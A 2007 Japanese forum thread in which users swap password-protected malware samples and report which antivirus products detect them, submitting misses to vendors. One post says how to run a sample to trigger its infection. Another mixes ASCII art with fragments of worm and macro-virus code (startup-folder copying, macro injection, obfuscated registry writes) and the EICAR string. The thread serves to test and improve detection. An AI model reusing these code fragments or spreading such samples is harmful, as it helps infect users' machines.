07/08/23 14:49:30
いや全然悔しくねぇ、ムダなシグネチャ発行を控えてくれてる方がずっと嬉しい。
628:531=530≠516
07/08/23 15:00:34
いや全然嬉しくねぇ、ムダなレスを控えてくれてる方がずっと嬉しい。
629:名無しさん@お腹いっぱい。
07/08/23 15:23:55
可否スレで無駄レスしながらなに吠えてんだよw
630:名無しさん@お腹いっぱい。
07/08/23 15:25:49
なんだその531=530≠516ってのは
631:名無しさん@お腹いっぱい。
07/08/23 15:45:13
>>627
悔しさが滲み出たレスだな。発行数の話じゃねえし、検出できるか出来ないの話ですから。
アンチウイルスがウイルスを検出しない事実が嬉しいとかもうキチガイの域。
632:名無しさん@お腹いっぱい。
07/08/23 16:13:57
でもそんなの関係ねえ!
633:名無しさん@お腹いっぱい。
07/08/23 19:24:56
Win32/Yossy/op.ap
634:名無しさん@お腹いっぱい。
07/08/23 19:45:16
>>617
Avira 未検出
635:名無しさん@お腹いっぱい。
07/08/23 20:20:48
>>617乙
Norton Internet Security 2007
反応無しなんで
贈りました
636:名無しさん@お腹いっぱい。
07/08/23 20:47:40
>>617
AVGスルー
提出しますた。
637:名無しさん@お腹いっぱい。
07/08/23 22:45:20
>>617
バスター2007
検出しないので提出
638:名無しさん@お腹いっぱい。
07/08/23 22:47:16
>>617
avast! 4 Home Editionスルー
検出しました。
639:638
07/08/23 22:49:13
検出しました。 X
提出しました。 ○
ごめん。
640:名無しさん@お腹いっぱい。
07/08/24 00:30:12
Avira AntiVir PersonalEdition Classic
対応した
--> tane_uljp00105/041E1383.exe
[DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Delf.afu.21 Backdoor server programs
641:名無しさん@お腹いっぱい。
07/08/24 10:39:35
URLリンク(www5.uploader.jp)
(pass=infected)
exeを実行し、「Brouse(参照)」を押してフォルダを指定し、「Install」を
押すと、マルウェア発動。
%WinDir%system32、Program Filesへ感染、
レジストリのRun項目、サービスなどへ登録
NOD32、AVG、Avest、Microsoft OneCare等で確認よろしくです。
642:名無しさん@お腹いっぱい。
07/08/24 19:06:41
>>641
呼ばれてないけどMcAfee
Generic PUP.h
643:名無しさん@お腹いっぱい。
07/08/24 20:42:32
>>641
Avira AntiVir PersonalEdition Classic
--> TamoSoft.CommView.for.WiFi.v4.2.360.Multilangual.Cracked-SSG.exe
[DETECTION] Contains signature of the dropper DR/MediaInject.A.1
644:名無しさん@お腹いっぱい。
07/08/24 22:14:36
>>641
ウイルスバスター2007
TROJ_Genericで検出のみ。
とりあえず提出
645:名無しさん@お腹いっぱい。
07/08/24 23:40:50
>641
お疲れ様です!!!!!。
avast! Antivirus Home未検出でした。
提出しました。
646:名無しさん@お腹いっぱい。
07/08/25 11:58:36
URLリンク(www5.uploader.jp)
pass: script
McAfeeには提出済み
全部スクリプトなんだけど、ここってスクリプトもあり?
647:名無しさん@お腹いっぱい。
07/08/25 14:35:56
>>646
㌧。
カスペ7
detected: malware DoS.JS.Dframe.n File: C:\Users\*\Desktop\tane_uljp00110\Script\0\page.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.li File: C:\Users\*\Desktop\tane_uljp00110\Script\9\sys614.js//JSPack
10個あるフォルダのうち、0と9のみ検出。後はスルー、
残りの8つは、一応検出しとっか。
判断はベンダーによりすごく分かれそうな気もするが・・・。(白黒つけがたい?)
648:名無しさん@お腹いっぱい。
07/08/25 19:38:46
>>647
GJ
649:647
07/08/25 19:48:58
RE: Please Inspect this file. A New Malware(Script)? [KLAB-2774799]
2007/08/25 (土) 18:06
Hello.
New malicious software was found in the attached files.
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.
Ph.: +7(495) 797-8700
E-mail: newvirus@kaspersky.com
URLリンク(www.kaspersky.com)<)
カスペルから返事キタ━━━(゜∀゜)━━━ !!
新しいのが見つかったので、シグネチャーに加えるみたいだ。
ただ、8つともまとめて送ったのででどれが白で、どれが黒かはこの3行ではわからん。orz
650:647
07/08/25 20:01:36
>>646
カスペ7では、結局、10/10
detected: malware DoS.JS.Dframe.n File: tane_uljp00110.zip/Script/0/page.htm
detected: Trojan program Trojan-Downloader.JS.Agent.nb File: tane_uljp00110.zip/Script/1/ind.html
detected: Trojan program Trojan-Clicker.HTML.IFrame.ae File: tane_uljp00110.zip/Script/2/stats.htm
detected: Trojan program Trojan-Downloader.JS.Agent.nc File: tane_uljp00110.zip/Script/3/sys614.js
detected: Trojan program Trojan-Downloader.JS.Psyme.kg File: tane_uljp00110.zip/Script/4/vip.htm
detected: Trojan program Trojan-Downloader.JS.Agent.nd File: tane_uljp00110.zip/Script/5/iexp.htm
detected: Trojan program Trojan-Downloader.JS.Agent.id File: tane_uljp00110.zip/Script/6/haha.js//JSPack
detected: Trojan program Trojan-Downloader.JS.Agent.id File: tane_uljp00110.zip/Script/7/haha.js
detected: Trojan program Trojan-Downloader.JS.Agent.nd File: tane_uljp00110.zip/Script/8/vip.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.li File: tane_uljp00110.zip/Script/9/sys614.js//JSPack
651:名無しさん@お腹いっぱい。
07/08/25 20:10:03
はえーな…。
652:名無しさん@お腹いっぱい。
07/08/25 20:21:43
流石カスペだな・・・
AntiVirはどうかな?
653:名無しさん@お腹いっぱい。
07/08/25 20:23:07
>>646
VIRUS TOTALで結果見てるけど
全ベンダでヒューリスティック検知できたのはind.htmlがwebwasher、stats.htmlがAntivirとwebwasherのみ。
Psyme亜種さえ検知できてない。
スクリプト系はシグネチャで対応するほかはなく ヒューリスティックは無力と言っていいと思う。
654:名無しさん@お腹いっぱい。
07/08/25 20:26:37
>>646
キラー
D:\virus\tane_uljp00110\Script\3\sys614.js
Trojan.DL.JS.Agent.lll
D:\virus\tane_uljp00110\Script\4\vip.htm
Trojan.DL.VBS.Agent.xhh
D:\virus\tane_uljp00110\Script\6\haha.js
Trojan.DL.JS.Agent.llm
D:\virus\tane_uljp00110\Script\7\haha.js
Trojan.DL.JS.THunder.i
655:名無しさん@お腹いっぱい。
07/08/25 20:29:11
NODは全滅でした><
656:名無しさん@お腹いっぱい。
07/08/25 20:47:05
>>646乙
Norton Internet Security 2007
北米に贈っておきました
657:名無しさん@お腹いっぱい。
07/08/25 20:48:13
>>655
NODだけじゃない Avast AVG McAfee Nortonも全滅
MsとBITがかろうじて1つ
げに恐ろしきはJS malware
658:名無しさん@お腹いっぱい。
07/08/25 20:57:08
殆ど無害だから検知するだけ煩わしい。
659:名無しさん@お腹いっぱい。
07/08/25 21:02:01
つ ROM
660:名無しさん@お腹いっぱい。
07/08/25 21:03:02
>>658
そう思うなら踏んでみろよw
661:名無しさん@お腹いっぱい。
07/08/25 21:10:28
信頼できるサイト以外は、JS以外は無効にするのが原則。
ただし、ずる賢いサイトは、サイトを表示するには、JavaScriptを有効にしてください。と表示されたり、真っ白だったりする。
で、試しに一時的に有効にすると攻撃。
662:名無しさん@お腹いっぱい。
07/08/25 21:21:11
今信頼できるサイトって定義が崩れかけてるよな。
投資信託の会社のホームページに不正JSが仕掛けられてるなんて
普通の人は想像もしないだろう。
URLリンク(www.morningstar.co.jp)
663:名無しさん@お腹いっぱい。
07/08/25 21:25:33
それにしては、2ちゃんねるは堅牢だな。
664:名無しさん@お腹いっぱい。
07/08/25 21:37:19
2ちゃんハックは難しいんだろうな
665:名無しさん@お腹いっぱい。
07/08/25 22:02:27
URLリンク(strawberry.secret.jp)
666:名無しさん@お腹いっぱい。
07/08/25 22:08:29
>>646
ウイルスバスター 2007(4.672.09)
D:\MW\tane_uljp00110\Script\0\page.htm : Possible_EncScr
D:\MW\tane_uljp00110\Script\3\sys614.js : JS_DLOADER.GWY
D:\MW\tane_uljp00110\Script\4\vip.htm : VBS_DLOADER.IDP
D:\MW\tane_uljp00110\Script\6\haha.js : JS_DLOADER.TAE
D:\MW\tane_uljp00110\Script\7\haha.js : Possible_EncScr
検体送付しました
667:名無しさん@お腹いっぱい。
07/08/26 03:36:24
>>646
AntiVir PE Classic 6.39.1.44
\Script\2\stats.htm
[DETECTION] Contains suspicious code HEUR/Exploit.HTML
\Script\3\sys614.js
[DETECTION] Contains signature of the Java script virus JS/Dldr.Agent.LA
\Script\4\vip.htm
[DETECTION] Contains signature of the Java script virus JS/Dldr.Agent.LC
\Script\7\haha.js
[DETECTION] Contains signature of the Java script virus JS/Agent.EN
\Script\9\sys614.js
[DETECTION] Is the Trojan horse TR/Dldr.Psyme.LI
ヒューリスティックで検出した2と残りは送っておいた。
668:名無しさん@お腹いっぱい。
07/08/26 05:49:15
ほう、Aviraも5個残ってるな。
それにしてもウィルスキラーはドラえもん、キティちゃん、北斗の拳とか
恥ずかしいけど、実力はかなりあるんじゃないか?
今までソースネクストと比べられる事が多かったけど
669:名無しさん@お腹いっぱい。
07/08/26 09:12:09
>>668
農奴32乙。
670:名無しさん@お腹いっぱい。
07/08/26 10:12:11
ヽ ヘ ノレ,
∧_∧ ヽ(。、::。.::・'゜・' )〆
(´Д`*.) / ̄ ̄ヽ::。 ).。:: θ) ←>1
i i⌒\__ノ ノ::・'゜。'゜ )ゝ
ヽヽ ヽ / /。、 ::。 )ヽ
)) )-─/ /’ /Υ/ γ\ヾ
// / // / // /\ \
((__ノ // / (_(_,ノ ) )
// ノ / / /
|_|_/ / / /
( ( <
\ \ \
(⌒_(⌒__ヽ
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
???????
671:名無しさん@お腹いっぱい。
07/08/26 10:16:31
キチガイ禁止
672:名無しさん@お腹いっぱい。
07/08/26 10:23:34
━┓
┏┛
━┓ _・ .━┓
┏┛ / ―\ ┏┛
・ /ノ (●)\ ・
. | (●) ⌒)\
. | (__ノ ̄ |
\ /
\ _ノ
/´ `\
| |
| |
673:名無しさん@お腹いっぱい。
07/08/26 10:56:18
ワラタ
674:名無しさん@お腹いっぱい。
07/08/26 11:08:27
URLリンク(www5.uploader.jp)
pass Packed.13
URLリンク(www.symantec.com)
↑
これ youtube偽装サイトからGET
.txtに変換してあるけど本来は.exe
675:名無しさん@お腹いっぱい。
07/08/26 11:22:17
>>674
カスペ 6
Email-Worm.Win32.Zhelatin.hi : C:\Temp\video.txt
676:名無しさん@お腹いっぱい。
07/08/26 11:42:52
メールで頻繁に来るecard.exeと同じ奴かね。
677:名無しさん@お腹いっぱい。
07/08/26 11:51:55
そうね いわゆるStorm Worm
GETしたサイトは多分Mpack使ってる ↓これとほぼ同じ感じだった
URLリンク(www.itmedia.co.jp)
678:名無しさん@お腹いっぱい。
07/08/26 12:02:03
>>674
Avira AntiVir PersonalEdition Classic
--> video.txt
[DETECTION] Contains signature of the worm WORM/Zhelatin.Gen
679:名無しさん@お腹いっぱい。
07/08/26 12:07:53
>>674
これ怖いな、拡張子まで偽装してる
うっかりクリックしてもおかしくないな
680:674
07/08/26 12:13:27
いや もともと.exeだったのを自分で.txtに変えただけ
.exeのままではなぜかエラーがでて圧縮できなかったんで変えた
.txtクリックしてもtxt形式のバイナリ画面でるだけ
681:名無しさん@お腹いっぱい。
07/08/26 12:57:34
txtでも、別ファイルで1行バッチなどでコード書けば、拡張子は簡単にexeに変わる
バイナリのtxt自体は怖くないが、exeに変えられたときが怖い
拡張子を限定してスキャンするのはちょっと危険かな。
682:名無しさん@お腹いっぱい。
07/08/26 13:10:54
>>674
ウイルスバスター 2007(4.672.16)
Suspicious_File : D:\MW\video.txt
ヒューリスティック検出なので検体送信完了
683:名無しさん@お腹いっぱい。
07/08/26 13:16:43
>>674
McAfeeスルーヽ(`Д´)ノ
eCard系はMcAfeeにしては対応早いんだけど
他所と比べるとどうもワンテンポ遅いんだよね…
684:名無しさん@お腹いっぱい。
07/08/26 14:34:10
>>674
Risingに贈呈しました
685:名無しさん@お腹いっぱい。
07/08/26 15:04:12
eCard(ゼラチン)、メールで山ほど来るよな。
一見テキスト形式でYouTubeやグリーティングカードへのリンクだけど
実際はIP書いてあって、アクセスするとexeが落ちてくる。
感染したPCが頒布してるんだろうな。
今まで1ダース以上拾っているけど、
バイナリ比較しても微妙に異なるので
ある程度はミューテーションする模様。
Packerはオリジナルっぽいね。
686:名無しさん@お腹いっぱい。
07/08/26 15:06:33
あとアクセスした先、いきなりexeが置いてあるわけではなく
脆弱性を突くためのスクリプトが難読化されてるんだけど
スクリプト解読していくとカスペへの罵りが出てきて笑った。
687:名無しさん@お腹いっぱい。
07/08/26 15:06:56
187 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/08/23(木) 14:12:01
TP13 forever(Symantec Blog,07/8/22,英語)
Trojan.Packer13(仮称、シマンテック命名)について、2007年でもっとも広く広まったウイルスに関与しているが、ヒューリスティックでも検出がおぼつかない。
関連したトロイは有名なTrojan.Peacommなど多数。
TP13の特徴は、不明なパッカーでパッキングされているトロイを見つけるヒューリスティックのセットを有する。
TP13は広く使われているようだ。また、20分ごとに悪意のあるファイルを頻繁にパックし、1日に最大3回までTP13自体をアップデートできる。
さらに、AVをだますアンチエミュレーション技術を有する。
Trojan.Peacommなどのポリモーフィック・ウイルスは、パフォーマンスの問題(AVスキャン時にポリモーフィックか否かを判定するのにそんなに多大な時間を掛けられない)や
AVベンダーが誤検出の多発をいやがる傾向から検出することが困難である。
新しい脅威が出現すると、アナリストは検知しようとするが、戦いは永遠に終わらない。
URLリンク(www.symantec.com)
688:684
07/08/26 20:30:51
>>674
1.文件名:video.txt
病毒名:Worm.Mail.Zhelatin.aiu
689:名無しさん@お腹いっぱい。
07/08/26 23:57:05
お聞きしたいのですが、ここのあるスレに投稿
したらIPアドレスが直接表示されてたのですが
大丈夫でしょうか?ダイアルアッブなので毎回アドは変わりますが。
ちなみそのスレはすぐ消えました。
690:名無しさん@お腹いっぱい。
07/08/27 00:16:31
>>689
もうおしまいだ。
691:名無しさん@お腹いっぱい。
07/08/27 00:39:45
おしまいって?
OSの再インストール?
毎回IP変わるから大丈夫でしょう?
692:名無しさん@お腹いっぱい。
07/08/27 02:30:05
IPアドレスは代わってもトロイが情報ばら撒くには問題ないよな
693:名無しさん@お腹いっぱい。
07/08/27 03:18:01
まぁOSの再インストールなんて慣れちまえばなんてことはない。
みんなが通ってる道だ。早く慣れることだな。
694:名無しさん@お腹いっぱい。
07/08/27 06:33:40
ありがとう。
ガク(。、)
695:名無しさん@お腹いっぱい。
07/08/27 07:18:37
最近のPCだとCドラの設定丸ごとDドラに保存する機能があるだろ
あれを使えば初心者でもリカバリなんて簡単に出来るんだが
それともリカバリ嫌いの奴って古いPC使いの初心者か?
古いPCだと何が一番邪魔臭いかってWindowsの再うp立てだな
SP2を最初から全部入れると数時間も掛かるから
リカバリを敬遠したくなるのも分る希ガス
696:名無しさん@お腹いっぱい。
07/08/27 10:17:12
まさか2ちゃんの狼というオチじゃないよね
697:654
07/08/27 12:14:00
>>646
1.文件名:page.htm
不是病毒
2.文件名:ind.html
病毒名:Trojan.DL.JS.Agent.llv
3.文件名:stats.htm
不是病毒
4.文件名:vip.htm
不是病毒
5.文件名:iexp.htm
病毒名:Trojan.DL.JS.Agent.llw
6.文件名:vip.htm
病毒名:Trojan.DL.JS.Agent.llx
7.文件名:sys614.js
病毒名:Trojan.DL.JS.Agent.lly
698:名無しさん@お腹いっぱい。
07/08/27 19:01:55
>>694です。
XPで、たいしてデータ、ソフト入ってないんで再インストでもいいのですが、
時間と更新のやり直しがめんどい。
一応Trojan2種類をセキュリティソフトの検査で検出したのでそのままで。
1ヶ月前は検出しなかったのだけど~
699:名無しさん@お腹いっぱい。
07/08/27 22:47:32
>>674
txt -> exeにしたらAvastが反応した
検出名はWin32:Tibs-BEL [Trj]
拡張子がtxtだとスキャンしてくれないみたい
700:名無しさん@お腹いっぱい。
07/08/27 22:51:59
>>699
Avast!はよくわからんが、設定画面ですべてスキャンするにしたら、検出するんじゃないか?
701:名無しさん@お腹いっぱい。
07/08/28 21:26:31
URLリンク(ime.nu)
702:名無しさん@お腹いっぱい。
07/08/28 23:19:51
CheatEngineね…。
>>605
703:名無しさん@お腹いっぱい。
07/09/02 20:40:19
検体URL
URLリンク(www5.uploader.jp)
ダウンロード/解凍パス
virus
704:名無しさん@お腹いっぱい。
07/09/02 21:03:17
>>703
VirusTotal
URLリンク(www.virustotal.com)
705:名無しさん@お腹いっぱい。
07/09/02 21:08:47
>>703Kaspersky
ダウンロードしようとしたら
Home / Viruses / Virus Encyclopedia / Malware Descriptions / Classic Viruses / File and Boot Viruses
Password-protected-EXE
Detection added Dec 31 1969 22:59 GMT
Behavior Virus
706:名無しさん@お腹いっぱい。
07/09/02 21:24:30
>>705
㌧
707:名無しさん@お腹いっぱい。
07/09/02 21:30:28
バスタ
CrackingApps Keygen
708:名無しさん@お腹いっぱい。
07/09/02 21:32:58
こういうの見るとNODのヒューリスティックってPanda以下かって思う
結構あんだよね、こういうの
709:名無しさん@お腹いっぱい。
07/09/02 21:33:04
NOD32 v2.7はスルー orz
710:名無しさん@お腹いっぱい。
07/09/02 21:33:31
>>703
Antivir
'TR/Agent.RIR.135 [TR/Agent.RIR.135]'
711:名無しさん@お腹いっぱい。
07/09/02 21:34:01
ゴミ屑を検知しても意味ないw
712:名無しさん@お腹いっぱい。
07/09/02 21:35:21
Keygenの真贋確認させてる
713:名無しさん@お腹いっぱい。
07/09/03 07:12:45
>>703
AVGスルー
検体送りました
714:名無しさん@お腹いっぱい。
07/09/03 08:58:55
>>703
McAfeeスルーヽ(`Д´)ノ
715:名無しさん@お腹いっぱい。
07/09/03 09:45:44
>>708
誤検知も含めてだけど、パンダはヒューステリックが優秀だと思う
716:名無しさん@お腹いっぱい。
07/09/03 15:51:04
>>703
Rising解析結果
1.文件名:Keygen1.exe
不是病毒
717:名無しさん@お腹いっぱい。
07/09/03 17:42:28
誤検知か?
718:名無しさん@お腹いっぱい。
07/09/03 18:18:21
割れ厨うぜぇ。キージェネの鑑定とかは他所でやれや。
719:名無しさん@お腹いっぱい。
07/09/03 19:38:24
キージェネはもうだめぽ。
悪い奴がウイルスを仕込むのに最適の餌食。
ソフトウェアの製造元ーがウイルスを混入してばらまいているかもしれない。
また、あえて、ベンダーが特殊なパッカーでAVで鳴るようなフェイクのジェネを大量にばらまいて
割れザーを混乱させているかもしれない。これは何の罪にもならない。
おわっとるよ。
720:名無しさん@お腹いっぱい。
07/09/03 20:30:32
割れ厨の主張はそれで終わりか?早く死ねよ。
721:名無しさん@お腹いっぱい。
07/09/03 22:18:21
バスター優秀じゃん
722:名無しさん@お腹いっぱい。
07/09/04 00:28:41
>>703
シマンテックに検体送付しました。
723:名無しさん@お腹いっぱい。
07/09/05 00:33:59
ニュイルスとか検体配布するサイト作ったら需要ある?
724:名無しさん@お腹いっぱい。
07/09/05 00:37:09
>>723
それは悪用されるんじゃまいか?
下手したら捕まるんじゃないか?
なんたらかんたら幇助で
725:名無しさん@お腹いっぱい。
07/09/05 00:43:17
なんたらかんたら幇助わらた
726:名無しさん@お腹いっぱい。
07/09/05 11:48:37
でもZIPにパスつければ
727:名無しさん@お腹いっぱい。
07/09/05 21:22:04
URLリンク(www5.uploader.jp)
pass 偽バスター
~トレンドマイクロのニセサイトへ接続し不正なプログラムをダウンロード
させるスパムメールが発見~
----ウイルス情報は下記をご覧ください----
URLリンク(www.trendmicro.co.jp)
ニセの警告メールでトレンドマイクロのニセサイトにおびき寄せ、
不正なプログラム をダウンロードさせる手口が確認されています。ご注意ください。
↑
ブツはこれ GETしたサイトはこれ Firefoxで踏んだら 思いっきり偽装サイト警告でたけどw
↓
URLリンク(www5.uploader.jp)
728:名無しさん@お腹いっぱい。
07/09/05 21:28:47
>>727
㌧。
カスペ7
detected: Trojan program Trojan-Dropper.Win32.Agent.btc File: C:\Users\***\Desktop\tane_uljp00117.zip/TMASInstall_EN_US.exe
118のサイトは全く同じだな。英語だから日本人は警戒するが、
あと、パスワードに、漢字はやめて。w
729:727
07/09/05 21:51:48
URLリンク(www5.uploader.jp)
警告画面もうpしてみた
730:名無しさん@お腹いっぱい。
07/09/06 03:19:11
>>727
Avira AntiVir PersonalEdition Classic
--> TMASInstall_EN_US.exe
[DETECTION] Is the Trojan horse TR/Drop.Agent.btc.1
731:名無しさん@お腹いっぱい。
07/09/06 09:27:13
誰か谷口ウイルスの検体持ってる人いませんか?
持ってたらUPしてほしい・・・
732:名無しさん@お腹いっぱい。
07/09/06 09:35:10
なんだ、お前の会社こんなのもゲットできねーのか
まぁ頑張れ弱小w
733:名無しさん@お腹いっぱい。
07/09/06 09:52:14
頑張れシマンテック
734:名無しさん@お腹いっぱい。
07/09/06 10:26:36
>>727
McAfeeスルーヽ(`Д´)ノ
そしてでかすぎて送れねぇ orz
いまどき3MBはねえだろ、常識的に考えて…
735:名無しさん@お腹いっぱい。
07/09/06 11:18:53
>727
お疲れ様です。
avast! Antivirus未検出の為
提出しておきました。
>734
NODも大き過ぎて検体送れないです・・・(未検出でした
736:名無しさん@お腹いっぱい。
07/09/06 15:33:35
>>727
その検体のどこがウイルスなんだ?
実行してみてもあやしい動きなしのただのTrend Micro製のアンチスパイウェア
ソフトじゃん
737:名無しさん@お腹いっぱい。
07/09/06 15:56:28
ウイルスバスター自体がウイル ry)
738:名無しさん@お腹いっぱい。
07/09/06 15:59:14
>>736
ドロッパーだよ
馬鹿は黙ってろ
739:名無しさん@お腹いっぱい。
07/09/06 16:23:15
谷口はまだ失敗作だと聞いたが。
740:名無しさん@お腹いっぱい。
07/09/06 17:33:11
>>738
でも何にも落ちてこない。
再起動しても変化なし。あやしいプロセスもないし通信もないし
741:名無しさん@お腹いっぱい。
07/09/06 17:35:43
怪しいプロセスもない。
→ルートキットの場合は見えないし、エクスプローラ、Dirでは見えない。
通信もない。
→SVCHOST.EXEや他のプロセスなどで通信することがある。
742:名無しさん@お腹いっぱい。
07/09/06 18:01:09
ルーキット検出系ツール使っても見つからなかった。
AntiSpyは問題なく使えます。
マジでトロイなのかこれ?
743:名無しさん@お腹いっぱい。
07/09/06 18:10:19
NOD対応したじゃん
744:名無しさん@お腹いっぱい。
07/09/06 18:20:23
>>742
お前の知能がしょぼかっただけだよ
いい加減黙ってくれないか?
ここはアンチウイルスが検出するかしないかのスレなんで
745:名無しさん@お腹いっぱい。
07/09/06 18:52:35
【罠】トレンドマイクロさんがウイルス対策ソフトただで配ってるらしいアルよー
スレリンク(news板)
746:名無しさん@お腹いっぱい。
07/09/08 18:25:52
URLリンク(www.dotup.org)
virus
747:名無しさん@お腹いっぱい。
07/09/08 18:57:56
>>746
McAfee
2.exe: Kakkeys
寂しいのう…
748:名無しさん@お腹いっぱい。
07/09/08 19:15:02
>>746
AntiVirに提出したらb.exeをウイルスではないと言ってきた
749:名無しさん@お腹いっぱい。
07/09/08 19:29:03
>>746
㌧。
カスペ7
7/14
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File: 2.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File: 3.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.t File: 6.exe
detected: Trojan program Trojan.Win32.Delf.zu File: 8.exe
detected: Trojan program Trojan.Win32.Delf.zu File: 9.exe
detected: Trojan program Trojan.Win32.Haradong.ar File: c.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File: e.exe
残り7つは飯食って風呂入ってオナってから検体提出。
これは全部ウイルスかもしれんね。
750:名無しさん@お腹いっぱい。
07/09/08 21:11:06
>>746
Hello,
1.exe_
No malicious code was found in this file.
Please quote all when answering.
--
Best regards, Vladimir Lebedev
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
URLリンク(www.kaspersky.com)
URLリンク(www.kaspersky.com) - free online virus scanner.
URLリンク(www.kaspersky.com) - technical support
カスペのアナリストでは、毒なし。
751:749
07/09/08 21:32:00
>>746
今は、8/14
d.exe追加
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File: 2.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File: 3.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.t File: 6.exe
detected: Trojan program Trojan.Win32.Delf.zu File: 8.exe
detected: Trojan program Trojan.Win32.Delf.zu File: 9.exe
detected: Trojan program Trojan.Win32.Haradong.ar File: c.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File: e.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File: www.dotup.org0748\a\d.exe
752:名無しさん@お腹いっぱい。
07/09/08 21:37:45
>>746
ウイルスバスター2007(CPR)
D:\SandBox\a\2.exe: TROJ_Generic
D:\SandBox\a\3.exe: TSPY_KAKKEYS.F
D:\SandBox\a\6.exe: TROJ_TANIGU.A
D:\SandBox\a\8.exe: TROJ_Generic
D:\SandBox\a\c.exe: TROJ_HARADONG.BD
D:\SandBox\a\e.exe: TROJ_KILLFILE.DT
検出漏れは送っておきました
753:名無しさん@お腹いっぱい。
07/09/08 21:43:13
>>746
Avira AntiVir PersonalEdition Classic
--> a/3.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.C.1
--> a/8.exe
[DETECTION] Is the Trojan horse TR/Delf.ZU
--> a/9.exe
[DETECTION] Is the Trojan horse TR/Delf.ZU.5
--> a/AntiLo/1/Data_1.exe
[DETECTION] Is the Trojan horse TR/Delf.UN.1
--> a/AntiLo/2/Data_1.exe
[DETECTION] Is the Trojan horse TR/PSW.Delf.CB
--> a/AntiLo/3/Data_1.exe
[DETECTION] Is the Trojan horse TR/Dldr.Agent.bym
--> a/c.exe
[DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen
--> a/d.exe
[DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen
--> a/e.exe
[DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen
残ったのはexe8個、antidojin.rb3個
754:名無しさん@お腹いっぱい。
07/09/08 21:50:28
>>746 1.exeとa.exeは白判定
From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Saturday, September 08, 2007 9:44 PM
To:
Subject: RE: Please Inspect This File. A New Malware? [KLAB-2871541]
Hello,
a.exe_
No malicious code was found in this file.
Please quote all when answering.
--
Best regards, Vladimir Lebedev
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
URLリンク(www.kaspersky.com)
755:名無しさん@お腹いっぱい。
07/09/08 21:52:17
>>752
6は谷口かーーーーーーーーーーーーーーー!
756:名無しさん@お腹いっぱい。
07/09/08 21:56:54
>>746
乙
ノートン
2.exe Trojan.Kakkeys.C
3.exe Trojan.Kakkeys.C
8.exe Trojan Horse
9.exe Trojan Horse
c.exe Trojan Horse
d.exe Trojan Horse
e.exe Trojan Horse
他、シマンテックに検体送付しました。
757:名無しさん@お腹いっぱい。
07/09/08 22:01:05
不発といわれているがシェル書き換えでexplorer起動不能にはなるみたいね
Kakkeys系に分類されるのは意外なキモス
758:名無しさん@お腹いっぱい。
07/09/08 22:07:39
ウイルスキラー
D:\virus\www.dotup.org0748\a\8.exe
Trojan.Delf.rky
D:\virus\www.dotup.org0748\a\9.exe
Trojan.Win32.Delf.rtl
2,3,7以外Risingに送付済み
759:名無しさん@お腹いっぱい。
07/09/08 22:35:21
>>746
1.exe URLリンク(www.virustotal.com)
2.exe URLリンク(www.virustotal.com)
3.exe URLリンク(www.virustotal.com)
4.exe URLリンク(www.virustotal.com)
5.exe URLリンク(www.virustotal.com)
6.exe URLリンク(www.virustotal.com)
7.exe URLリンク(www.virustotal.com)
8.exe URLリンク(www.virustotal.com)
9.exe URLリンク(www.virustotal.com)
a.exe URLリンク(www.virustotal.com)
b.exe URLリンク(www.virustotal.com)
c.exe URLリンク(www.virustotal.com)
d.exe URLリンク(www.virustotal.com)
e.exe URLリンク(www.virustotal.com)
760:名無しさん@お腹いっぱい。
07/09/08 23:58:51
>746
お疲れ様です!!!。
塊のままスキャンした結果です。
URLリンク(www7.uploader.jp)
URLリンク(www7.uploader.jp)
761:名無しさん@お腹いっぱい。
07/09/09 00:36:19
>>746
まだ送ってないのにキングが7つほど検出したのでビックリ
762:名無しさん@お腹いっぱい。
07/09/09 00:46:22
>>746
NOD32 6つ
時間 モジュール 対象 名前
2007/09/09 0:36:56 AMON ファイル Y:\a\c.exe Win32/Haradong.AR トロイ
2007/09/09 0:36:55 AMON ファイル Y:\a\e.exe Win32/Haradong トロイ の亜種
2007/09/09 0:36:54 AMON ファイル Y:\a\d.exe Win32/Haradong トロイ の亜種
2007/09/09 0:36:53 AMON ファイル Y:\a\9.exe ウイルスの可能性 : NewHeur_PE ウイルス (シグネチャなしで検知)
2007/09/09 0:36:51 AMON ファイル Y:\a\8.exe ウイルスの可能性 : NewHeur_PE ウイルス (シグネチャなしで検知)
2007/09/09 0:36:48 AMON ファイル Y:\a\3.exe Win32/Kakkeys.C トロイ
カスペとの違い
NOD32未検出・・・2.exeと6.exe
カスペ未検出・・・・d.exe
763:名無しさん@お腹いっぱい。
07/09/09 01:10:15
>>727
